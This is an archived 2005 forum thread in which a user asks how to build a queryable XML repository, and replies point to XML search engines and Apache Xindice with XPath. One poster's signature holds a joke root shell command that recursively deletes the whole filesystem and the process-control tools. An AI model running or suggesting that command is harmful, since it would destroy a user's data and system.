    Thanks,
    Saurabh Aggrawal.

    , Mar 7, 2005

  2. Peter Flynn Guest

    wrote:

    > Hi,
    > I have a xml file and i want to make the repository of it so that i can
    > fire queries on it to extract the data i need from the XML file. Does
    > anyone know how to make the XML repository.

    A repository is just a place where you put files for safe keeping. It
    doesn't have to have anything to do with querying.

    If you want to search an XML file, Google for "XML search engine"

    ///Peter
    --
    sudo sh -c "cd /; /bin/rm -rf `which killall kill ps shutdown` * &"

    Peter Flynn, Mar 11, 2005

  3. Romin Irani Guest

    wrote in message news:<>...
    > Hi,
    > I have a xml file and i want to make the repository of it so that i can
    > fire queries on it to extract the data i need from the XML file. Does
    > anyone know how to make the XML repository.
    > Thanks,
    > Saurabh Aggrawal.

    In case you are still looking for a repository, give Apache Xindice
    (http://xml.apache.org/xindice/) a try. It is simple to setup and use
    but you should give it a test run and see if it meets your
    requirements.

    Romin Irani, Mar 15, 2005

    Not Exactly, I am not looking for a simple XML search engine. I want
    that search engine to filterout the queries, for example: If there is a
    class A then "how many classes are drived form class A" or "How many
    classes are dependent on Class A" or "If I have a group of A to Z
    classes then how many of them are Singleton Classes".

    Regards,
    Saurabh Aggrawal

    , Mar 18, 2005
  5. Romin Guest

    If what you are trying to search can be represented by XPath, you
    should take a look at Xindice -- as I mentioned.

    Romin.

    Romin, Mar 23, 2005